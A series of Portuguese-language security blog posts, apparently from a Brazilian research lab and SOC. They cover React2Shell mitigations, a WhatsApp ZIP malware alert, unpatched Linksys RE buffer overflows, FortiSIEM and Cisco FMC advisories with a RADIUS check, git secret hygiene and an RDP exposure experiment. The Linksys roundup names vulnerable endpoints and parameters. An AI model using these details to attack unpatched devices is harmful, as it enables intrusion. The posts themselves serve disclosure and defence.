A vulnerabilidade CVE-2025-55182 apresenta características típicas de uma falha altamente explorável, combinando baixa complexidade, impacto máximo, exploração silenciosa e ampla superfície de ataque (React + Next.js).
Os resultados laboratoriais evidenciam que assinaturas tradicionais não são suficientes para detectar o ataque — detecção comportamental em nível de processo e rede é determinante para identificar anomalias — e explicam o curto intervalo de tempo entre divulgação e exploração, pela facilidade desta, com grupos ativamente desenvolvendo variantes.
Ambientes que dependem apenas do antivírus nativo ou ferramentas desatualizadas ficam completamente expostos.
6. Mitigação e Recomendações
Para mitigar a vulnerabilidade CVE-2025-55182, recomenda-se:
Atualizar o Next.js para versão 16.0.7 ou superior – Sendo a ação mais crítica e urgente para todos os ambientes de produção.
Monitorar eventos ou tentativas de execução de payload – Implementar regras de detecção em plataformas EDR para identificar requisições POST suspeitas direcionadas a Server Functions.
Implementar Web Application Firewall (WAF) com regras para detectar chaves com ‘$’ e ‘:’ já que são características de ataques abusando dessa vulnerabilidade.
Manter logs detalhados de requisições POST e analisar regularmente para atividades suspeitas.
Realizar auditorias de segurança em aplicações React/Next.js para identificar potenciais pontos de exposição.
Caso necessário, é possível atribuir um limite de recursos ao processo do Node.js, isolar em containers (Hardening) ou feature flags para desativar parcialmente a RSC onde não for necessária.
REFERÊNCIAS
[1] NIST National Vulnerability Database, “CVE-2025-55182,” NVD, 3 de dezembro de 2025. [Online]. Disponível em: https://nvd.nist.gov/vuln/detail/CVE-2025-55182. [Acessado em: 10-Dez-2025].
[2] msanft, “CVE-2025-55182,” GitHub, 4 de dezembro de 2025. [Online]. Disponível em: https://github.com/msanft/CVE-2025-55182. [Acessado em: 10-Dez-2025].
[3] CJ Moses, “China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182),” Amazon Security Blog, 4 de dezembro de 2025. [Online]. Disponível em: https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/. [Acessado em: 10-Dez-2025].
[4] Rapid7, “React2Shell (CVE-2025-55182) – Critical unauthenticated RCE affecting React Server Components,” Rapid7 Blog, 4 de dezembro de 2025 (lançamento); 8 de dezembro de 2025 (atualização). [Online]. Disponível em: https://www.rapid7.com/blog/post/etr-react2shell-cve-2025-55182-critical-unauthenticated-rce-affecting-react-server-components/. [Acessado em: 10-Dez-2025].
Estamos lidando massivamente com a resposta a incidente que vem ocorrendo nessa semana. O ataque inicia via Whatsapp, aplicativo muito utilizado no nosso país.
O objetivo é notificar a todos desse ataque, onde se inicia a partir de arquivo ZIP compartilhado pelo mensageiro, sugerindo o usuário baixar em sua estação e descompactar para execução dos arquivos relacionados e posteriormente iniciar sua exploração.
Sempre desconfie e análise com cautela das informações ao qual recebe e envia, duvide de arquivos, mensagens, promoções e qualquer outra categoria de mensagem.
Recomendações:
Controlar aplicações não corporativas no ambiente;
Implantar XDR no ambiente para análise comportamental;
Formado em Análise e Desenvolvimento de Sistemas na Fatec Rio Preto, comecei minha carreira com gerenciamento de infraestrutura terceirizada focado no Mercado Microsoft. Windows Server, Microsoft 365 e outros produtos da família foram o meu dia a dia por muitos anos. Como sempre focamos em manter os sistemas com os melhores processos de segurança, iniciamos os estudos para Cybersegurança. Pentest Profissional – Desec, Cursos do Cert.BR e certificações Palo Alto foram partes desse caminho, atualmente ao lado do time de SOC na CYLO temos o objetivo principal “Prevenir perdas”!
Nos últimos 7 dias (16 a 23 de agosto de 2025), com base em fontes públicas, realizamos um levantamento das vulnerabilidades registradas em roteadores e extensores de alcance de Wi-Fi da marca Linksys. As falhas identificadas são majoritariamente do tipo stack-based buffer overflow, remotamente exploráveis, e afetam modelos específicos da série RE, permitindo ataques sem autenticação.
Divulgadas recentemente, essas vulnerabilidades não receberam resposta do fabricante para notificações de divulgação coordenada, e não há patches disponíveis mencionados nas fontes, reforçando a importância de monitoramento contínuo e mitigação proativa. Elas são semelhantes entre si, afetando funções específicas no firmware dos dispositivos. Em seguida apresentamos esse levantamento para fins de acompanhamento:
CVEs Catalogados na Semana
1. CVE-2025-9356
Descrição: Extravazamento de buffer baseado em pilha na função inboundFilterAdd do endpoint /goform/inboundFilterAdd, desencadeado por um parâmetro ruleName excessivamente longo. Permite execução de código arbitrário remotamente, sem autenticação.
Descrição: Transbordamento de buffer baseado em pilha na função DisablePasswordAlertRedirect do arquivo /goform/DisablePasswordAlertRedirect, manipulado pelo argumento hint. Ataque remoto possível, com exploit público.
Descrição: Transbordamento de buffer baseado em pilha na função DHCPReserveAddGroup, manipulado pelos parâmetros enable_group, name_group, ip_group e mac_group. Permite acesso não autorizado e comprometimento da integridade do dispositivo remotamente.
Descrição: Transbordamento de buffer baseado em pilha na função RP_doSpecifySiteSurvey do arquivo /goform/RP_doSpecifySiteSurvey, manipulado pelo argumento ssidhex. Ataque remoto possível, com exploit público.
Descrição: Transbordamento de buffer baseado em pilha na função sta_wps_pin, manipulado pelo argumento Ssid. Permite execução de código remoto, comprometendo o dispositivo.
Produtos afetados: Linksys RE6250 (1.0.013.001, 1.0.04.001, 1.0.04.002); provavelmente afeta outros da série RE.
Todas essas vulnerabilidades são remotamente exploráveis e não requerem interação do usuário ou privilégios elevados em muitos casos. Elas foram divulgadas em fontes como VulDB, SecAlerts e SecurityVulnerability.io, mas algumas ainda não aparecem no NVD (National Vulnerability Database) do NIST, possivelmente devido a atrasos na catalogação.
Há indícios de mais vulnerabilidades semelhantes na série RE (ex.: CVE-2025-9360, 9362, 9363 no VulDB), mas sem detalhes completos disponíveis nas buscas realizadas. Elas parecem seguir o mesmo padrão de buffer overflows.
Os valores de EPSS são baixos para as vulnerabilidades com dados disponíveis, indicando probabilidade reduzida de exploração imediata, mas o percentil ~12% sugere que elas estão acima de uma pequena porção de vulnerabilidades em termos de risco relativo. Para CVE-2025-9356, como é mais recente, o EPSS ainda não foi calculado no momento de escrita dessa publicação (23/08/2025 -13h25m GNT-3).
Recomendação: Atualize o firmware dos dispositivos Linksys o mais breve possível, desative o gerenciamento remoto se não for necessário, e monitore alertas de segurança. Para mais detalhes, consulte os sites de origem ou o site oficial da Linksys.
Se não houver vulnerabilidades adicionais ou se o período exato não capturou mais registros, isso reflete as informações disponíveis em tempo real.
Referências
CVE-2025-9356 – cvefeed.io. “Linksys Wireless Router Stack-Based Buffer Overflow Vulnerability.” Publicado em 22 de agosto de 2025. Disponível em: https://cvefeed.io/cve/CVE-2025-9356
CVE-2025-9252 – VulDB. “Linksys RE6250, RE6300, RE6350, RE6500, RE7000, RE9000 DisablePasswordAlertRedirect stack-based buffer overflow.” Publicado em 20 de agosto de 2025. Disponível em: https://vuldb.com/?id.275566
CVE-2025-9249 – VulDB. “Linksys RE6250, RE6300, RE6350, RE6500, RE7000, RE9000 DHCPReserveAddGroup stack-based buffer overflow.” Publicado em 20 de agosto de 2025. Disponível em: https://vuldb.com/?id.275563
CVE-2025-9253 – VulDB. “Linksys RE6250, RE6300, RE6350, RE6500, RE7000, RE9000 RP_doSpecifySiteSurvey stack-based buffer overflow.” Publicado em 20 de agosto de 2025. Disponível em: https://vuldb.com/?id.275567
CVE-2025-9251 – VulDB. “Linksys RE6250, RE6300, RE6350, RE6500, RE7000, RE9000 sta_wps_pin stack-based buffer overflow.” Publicado em 20 de agosto de 2025. Disponível em: https://vuldb.com/?id.275565
@CVEnew on X. Postagens sobre CVE-2025-9356, CVE-2025-9252, CVE-2025-9249, CVE-2025-9253, CVE-2025-9251. Publicado entre 20 e 22 de agosto de 2025. Disponível em: https://x.com/CVEnew
Adriano Mauro Cansian, Doutor em Física Computacional e Professor Associado e pesquisador da UNESP – Universidade Estadual Paulista, possui 30 anos de experiência em pesquisa, desenvolvimento e ensino de segurança cibernética. Fundador e coordenador do Laboratório ACME! Cybersecurity Research, e revisor das revistas “Computers & Security” e “International Journal of Forensic Computer Science“, consultor e membro de vários comitês e organizações técnicas para promover a pesquisa em segurança da informação, além de atuar como voluntário em organizações de governança da Internet.
Estamos cientes que a Fortinet emitiu um alerta sobre uma vulnerabilidade de gravidade crítica que afeta seu produto FortiSIEM. A falha foi catalogada como a vulnerabilidade CVE-2025-25256, e permite que um invasor não autenticado execute comandos remotamente no sistema operacional dos dispositivos afetados.
A vulnerabilidade recebeu uma pontuação CVSS de 9.8, refletindo seu potencial de impacto máximo. A exploração bem-sucedida pode resultar no comprometimento total do equipamento, permitindo que o invasor execute código arbitrário com privilégios elevados.
Apesar da Fortinet não haver especificados indicadores de comprometimento (IoCs), temos a confirmação de que já existe pelo menos um código deexploit funcional para esta falha, o que significa que ataques ativos estão em andamento. Isso eleva drasticamente a urgência para a aplicação das devidas correções.
Detalhes Técnicos da Vulnerabilidade
Causa Raiz: A falha reside em uma vulnerabilidade de injeção de comando no sistema operacional, que pode ser acionada por meio de solicitações CLI (Interface de Linha de Comando) especialmente criadas para esse fim.
Vetor de Ataque: O ataque pode ser realizado remotamente, sem a necessidade de qualquer tipo de autenticação prévia, tornando qualquer sistema vulnerável exposto à internet um alvo fácil.
Impacto: A exploração permite a Execução Remota de Código (RCE), dando ao atacante controle total sobre o sistema FortiSIEM.
Versões Afetadas
A vulnerabilidade impacta muitas versões do FortiSIEM. As organizações que utilizam as seguintes versões devem tomar ações imediatas:
Version
Affected
Solution
FortiSIEM 7.4
Not affected
Not Applicable
FortiSIEM 7.3
7.3.0 through 7.3.1
Upgrade to 7.3.2 or above
FortiSIEM 7.2
7.2.0 through 7.2.5
Upgrade to 7.2.6 or above
FortiSIEM 7.1
7.1.0 through 7.1.7
Upgrade to 7.1.8 or above
FortiSIEM 7.0
7.0.0 through 7.0.3
Upgrade to 7.0.4 or above
FortiSIEM 6.7
6.7.0 through 6.7.9
Upgrade to 6.7.10 or above
FortiSIEM 6.6
6.6 all versions
Migrate to a fixed release
FortiSIEM 6.5
6.5 all versions
Migrate to a fixed release
FortiSIEM 6.4
6.4 all versions
Migrate to a fixed release
FortiSIEM 6.3
6.3 all versions
Migrate to a fixed release
FortiSIEM 6.2
6.2 all versions
Migrate to a fixed release
FortiSIEM 6.1
6.1 all versions
Migrate to a fixed release
FortiSIEM 5.4
5.4 all versions
Migrate to a fixed release
Recomendações e Mitigação
A recomendação principal e mais eficaz é a atualização imediata dos sistemas para as versões corrigidas disponibilizadas pela Fortinet.
Para ambientes onde a aplicação do patch não pode ser realizada imediatamente, a Fortinet sugere uma mitigação temporária: restringir o acesso à porta 7900 (phMonitor) do FortiSIEM, limitando a exposição a redes confiáveis e bloqueando o acesso externo.
Dada a existência de um exploit ativo, a inação não é uma opção. Recomenda-se que todos os administradores de sistemas Fortinet validem suas versões e apliquem os patches de segurança com a máxima prioridade para proteger seus ativos contra comprometimento.
Adriano Mauro Cansian, Doutor em Física Computacional e Professor Associado e pesquisador da UNESP – Universidade Estadual Paulista, possui 30 anos de experiência em pesquisa, desenvolvimento e ensino de segurança cibernética. Fundador e coordenador do Laboratório ACME! Cybersecurity Research, e revisor das revistas “Computers & Security” e “International Journal of Forensic Computer Science“, consultor e membro de vários comitês e organizações técnicas para promover a pesquisa em segurança da informação, além de atuar como voluntário em organizações de governança da Internet.
Publicada em 14 de agosto de 2025, a vulnerabilidade CVE-2025-20265 é uma falha de segurança crítica encontrada no software Cisco Secure Firewall Management Center (FMC) que permite a um invasor remoto e não autenticado injetar e executar comandos arbitrários no dispositivo. A vulnerabilidade recebeu o valor de pontuação máxima de 10.0 no Common Vulnerability Scoring System (CVSS), classificando-a como “CRÍTICA”, e demandando atenção imediata.
Baixo Risco de Exploração: probabilidade baixa de exploração nos próximos 30 dias
Monitoramento Contínuo: Recomenda-se continuar acompanhando nos próximos dias/semanas. Utilize esse [LINK].
Pré-condição importante:
Entretanto, antes que se entre em pânico, é importante saber que existe uma pré-condição específica e indispensável para que a vulnerabilidade CVE-2025-20265 possa ser explorada: O software Cisco Secure Firewall Management Center (FMC) deve estar configurado para usar autenticação externa via RADIUS.
Isso se aplica tanto para o acesso à interface de gerenciamento baseada na web quanto para o acesso via SSH.
Se o sistema não estiver usando RADIUS para autenticação (por exemplo, se estiver usando contas de usuário locais, LDAP ou SAML), ele não está vulnerável a esta falha específica, mesmo que esteja executando uma versão de software afetada. A rota de ataque depende inteiramente da maneira como o subsistema RADIUS processa as credenciais de login.
IMPORTANTE: mesmo que você não utilize autenticação RADIUS, certifique-se que ela não está habilitada. Veja as instruções no apêndice desse texto, mais abaixo.
Pontos principais:
Causa: A falha ocorre devido ao tratamento inadequado da entrada do usuário durante a fase de autenticação no subsistema RADIUS. Um invasor pode explorar isso enviando entradas criadas especificamente ao inserir credenciais para serem autenticadas no servidor RADIUS configurado.
Fraqueza: CWE-74Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)
Impacto: Uma exploração bem-sucedida pode permitir que o invasor execute comandos com um alto nível de privilégio, levando a uma possível comprometimento completo do sistema.
Produtos Afetados: As versões 7.0.7 e 7.7.0 do software Cisco Secure FMC são afetadas se tiverem a autenticação RADIUS ativada para a interface de gerenciamento baseada na web, gerenciamento SSH ou ambos.
Descoberta: A vulnerabilidade foi descoberta por um engenheiro de software da Cisco durante testes de segurança internos. Até o momento, a Cisco não tem conhecimento de nenhuma exploração desta vulnerabilidade em ataques reais.
Probabilidade de exploração: no momento de escrita desse alerta (17.ago.2025 18:30 GMT-3) a análise do EPSS que indica a probabilidade de exploração encontra-se pendente. O sistema EPSS atualiza suas pontuações diariamente, e é provável que um valor para esta CVE seja disponibilizado em breve, dada a sua alta criticidade. Até o momento não existe exploit público de ataque disponível, até onde se sabe.
Solução principal:
A correção para essa vulnerabilidade é simples. A forma mais eficaz e recomendada de corrigi-la é instalar as atualizações de software fornecidas pela Cisco. Os administradores devem atualizar seus sistemas para uma versão de software que não esteja vulnerável.
Se não for possível aplicar a atualização de software imediatamente, a Cisco recomenda as seguintes ações para mitigar o risco:
Desativar a Autenticação RADIUS: A vulnerabilidade só pode ser explorada se a autenticação externa via RADIUS estiver habilitada. A principal mitigação é desativar o RADIUS para o acesso de gerenciamento (tanto para a interface web quanto para o SSH).
Usar Métodos de Autenticação Alternativos: Em vez de RADIUS, os administradores podem configurar outros métodos de autenticação que não são afetados por esta vulnerabilidade, como:
Contas de usuário locais.
Autenticação externa via LDAP (Lightweight Directory Access Protocol).
Logon Único (SSO) usando SAML (Security Assertion Markup Language).
APÊNDICE – Como verificar se a autenticação RADIUS está habilitada no Cisco
1. Passo a Passo para Verificação via interface web
O processo consiste em duas etapas principais:
Verificar se existe um servidor RADIUS configurado e ativo.
Confirmar se esse servidor RADIUS está sendo usado para autenticação.
Etapa 1: Localizar e Inspecionar os Servidores de Autenticação Externa
Primeiro, você precisa ver onde os servidores de autenticação externa, como RADIUS, LDAP ou SAML, são configurados.
Faça login na interface web do seu FMC.
Navegue até a página de Autenticação Externa:
No menu superior, clique em System (Sistema).No menu suspenso, clique em Users (Usuários).Na página de Usuários, clique na aba External Authentication (Autenticação Externa).
O caminho é: System > Users > External Authentication.
Analise a Lista de Objetos de Autenticação:
Nesta página, você verá uma lista de todos os “objetos” de autenticação externa que foram criados.
Procure por qualquer objeto na lista cujo Authentication Method (Método de Autenticação) seja RADIUS.
Verifique o Status do Objeto RADIUS:
Depois de encontrar um objeto RADIUS, olhe para a coluna Status.
Se o círculo de status estiver verde e o texto disser Enabled (Habilitado), significa que o FMC tem uma configuração RADIUS funcional e ativa.
O que isso significa até agora? Você confirmou que o FMC está configurado para se comunicar com um servidor RADIUS. Agora, precisamos verificar se ele está realmente usando essa configuração para logins.
Etapa 2: Verificar se o RADIUS é o Método de Login Padrão
Mesmo que um servidor RADIUS esteja habilitado, ele pode não estar em uso. Ele precisa ser definido como o método de autenticação para os logins da interface web ou do SSH.
Permaneça na mesma página (System > Users > External Authentication).
Role a página para baixo até encontrar a seção chamada Default Authentication (Autenticação Padrão).
Examine as Configurações Padrão:
Esta seção permite que você defina qual método de autenticação será usado por padrão para diferentes tipos de acesso.
Procure pelas opções:
Web: Para logins na interface gráfica.
SSH: Para logins via linha de comando.
Verifique se o RADIUS está selecionado:
Olhe para os menus suspensos ao lado de Web e SSH.
Se algum desses menus estiver configurado para usar o objeto de autenticação RADIUS que você identificou na Etapa 1, então a autenticação RADIUS está ativa e em uso para esse tipo de acesso.
Para estar vulnerável à CVE-2025-20265, as seguintes condições devem ser verdadeiras na interface web:
(Condição 1 / Etapa 1): Você tem um objeto de autenticação externa com o método RADIUS que está Habilitado (Enabled)
AND
(Condição 2 / Etapa 2): Na seção Default Authentication, o menu suspenso para Web ou SSH (ou ambos) está selecionado para usar esse objeto RADIUS.
Se ambas as condições forem atendidas e sua versão de software for uma das afetadas (como 7.7.0 ou 7.0.7), seu sistema está vulnerável e requer ação imediata.
2. Passo a Passo para Verificação via CLI
A configuração de autenticação externa não é gerenciada por um único comando “show” simples. Você precisará inspecionar os arquivos de configuração diretamente ou usar utilitários do sistema. A maneira mais confiável é usar o FMC expert mode para acessar o shell do Linux e, em seguida, consultar o banco de dados de configuração. O método recomendado via CLI é:
Acesse a CLI do FMC: Conecte-se ao seu dispositivo FMC usando SSH.
Entre no Modo expert: No prompt da CLI, digite o comando expert. Isso lhe dará acesso ao shell do Linux subjacente.Bash> expert
Execute o Comando de Consulta ao Banco de Dados: O FMC armazena suas configurações em um banco de dados. Você pode consultá-lo diretamente para encontrar as configurações de autenticação RADIUS. O comando a seguir usa mysql para consultar a tabela auth_modules no banco de dados usm_db e filtra por módulos RADIUS.Copie e cole o seguinte comando completo no prompt do expert mode:
% sudo /usr/local/sf/bin/sf-mysql -e 'SELECT name, is_enabled, is_default_web, is_default_cli FROM usm_db.auth_modules WHERE type="Radius"'
Como Interpretar a Saída
O comando retornará uma tabela. Preste atenção nas seguintes colunas para cada servidor RADIUS configurado (identificado pela coluna name):
is_enabled: Se o valor for 1, o objeto de autenticação RADIUS está habilitado. Se for 0, está desabilitado.
is_default_web: Se o valor for 1, este servidor RADIUS é usado para a autenticação padrão da interface web.
is_default_cli: Se o valor for 1, este servidor RADIUS é usado para a autenticação padrão do acesso SSH/CLI.
O objeto “ServidorRADIUS_Corp” está habilitado (is_enabled = 1).
Ele é usado para autenticação web (is_default_web = 1).
Ele é usado para autenticação CLI/SSH (is_default_cli = 1).
Se você vir is_enabled como 1 e pelo menos um dos is_default_web ou is_default_cli também como 1, seu sistema está usando autenticação RADIUS e está vulnerável (se estiver em uma versão de software afetada).
Se a tabela estiver vazia ou se todos os valores nas colunas is_enabled, is_default_web e is_default_cli forem 0, então a autenticação RADIUS não está ativa e você não está exposto a esta vulnerabilidade específica.
Este método CLI é ideal para verificações rápidas, auditorias ou para uso em scripts de automação.
Adriano Mauro Cansian, Doutor em Física Computacional e Professor Associado e pesquisador da UNESP – Universidade Estadual Paulista, possui 30 anos de experiência em pesquisa, desenvolvimento e ensino de segurança cibernética. Fundador e coordenador do Laboratório ACME! Cybersecurity Research, e revisor das revistas “Computers & Security” e “International Journal of Forensic Computer Science“, consultor e membro de vários comitês e organizações técnicas para promover a pesquisa em segurança da informação, além de atuar como voluntário em organizações de governança da Internet.
Recentemente, estava explorando o repositório GitHub de um framework que utilizo para desenvolvimento. Observando modificações recentes, me deparei com um commit que me deixou inicialmente muito confuso: uma chave privada, aparentemente utilizada para assinar o pacote de instalação do framework, havia sido adicionada aos arquivos do repositório.
Felizmente, após inspecionar a chave pública acompanhante, revelou-se que a chave foi credenciada para o domínio yourdomain.com. Comentando isso com um colega de trabalho, ele me instruiu que isso é, na verdade, algo relativamente comum: adicionar arquivos com uma chave de exemplo ao repositório para que a estrutura de arquivos fique completa. Adicionalmente, em alguns casos (como desenvolvimento de aplicações web), é possível utilizar esse certificado no ambiente de desenvolvimento local redirecionando o domínio de exemplo para o local host via alteração do arquivo hosts.
Digo que fiquei aliviado descobrindo que a adição da chave ao repositório foi, muito provavelmente, intencional e não impõe um risco de segurança ao projeto (é um dos meus frameworks favoritos). Reconheço que acidentes, especialmente quanto a adição de arquivos no Git que não deveriam ser adicionados, acontecem. Inúmeras vezes já ansiosamente executei git add .; git commit -m "..." no terminal, descobrindo somente depois que havia algum artefato de compilação, ou arquivo de cache (estou olhando para você, mypy), esquecido no diretório do projeto que agora havia sido imortalizado no repositório pela execução precoce do comando. Como diz o ditado, “once in git, always in git”.
Hoje em dia sou moderadamente mais cauteloso e ademais, grato pelas abençoadas almas que dispõem modelos de .gitignore na web. Porém, pessoalmente não julgo cautela como suficiente! Utilizo no meu desenvolvimento o pre-commit, uma ferramenta que realiza verificações automáticas antes de toda modificação de arquivos em um repositório Git. Incidentalmente, um dos pluginsdisponibilizados por padrão pela ferramenta possui um teste que previne o commit acidental de uma chave privada.
Matheus Augusto da Silva Santos, aluno de Bacharelado em Ciências da Computação na UNESP — Universidade Estadual Paulista. Aspirante a engenheiro de software focado em uso de boas práticas de programação e segurança para elaboração de sistemas robustos, seguros e confiáveis.
Durante um estudo para um projeto interno, onde criamos ambientes propositalmente vulneráveis, obtivemos resultados interessantes ao analisar fatores relacionados a conexões externas.
Por mais de um mês, mantivemos a porta de RDP (3389) aberta exclusivamente para conexões originadas do Brasil. Mesmo com essa restrição geográfica, registramos diversas tentativas de exploração, força bruta de senhas e uso de ferramentas de escaneamento. No entanto, nenhum sistema foi comprometido.
Decidimos então testar o extremo: liberamos o acesso RDP 3389 para o mundo inteiro. O resultado? Em menos de 24 horas, tivemos um sistema comprometido.
Isso levanta uma questão: o Brasil sofre menos ataques? A resposta é não. Segundo o relatório da IBM, as empresas brasileiras estão entre as cinco mais atacadas do mundo.
O que temos observado é que muitas empresas mantêm sistemas expostos à internet sem as devidas proteções. Sites como o Shodan.io realizam varreduras globais em busca de serviços abertos, revelando a fragilidade de muitas infraestruturas.
Times de infraestrutura e segurança precisam implementar camadas de proteção: firewalls, IPS, regras de controle e restrições geográficas são medidas que podem salvar empresas em risco.
Por fim, deixo uma reflexão: você, que atua em infraestrutura, segurança ou áreas correlatas, já validou se suas aplicações expostas externamente possuem restrições de origem bem definidas? Se não, qual é a desculpa?
Formado em Análise e Desenvolvimento de Sistemas na Fatec Rio Preto, comecei minha carreira com gerenciamento de infraestrutura terceirizada focado no Mercado Microsoft. Windows Server, Microsoft 365 e outros produtos da família foram o meu dia a dia por muitos anos. Como sempre focamos em manter os sistemas com os melhores processos de segurança, iniciamos os estudos para Cybersegurança. Pentest Profissional – Desec, Cursos do Cert.BR e certificações Palo Alto foram partes desse caminho, atualmente ao lado do time de SOC na CYLO temos o objetivo principal “Prevenir perdas”!
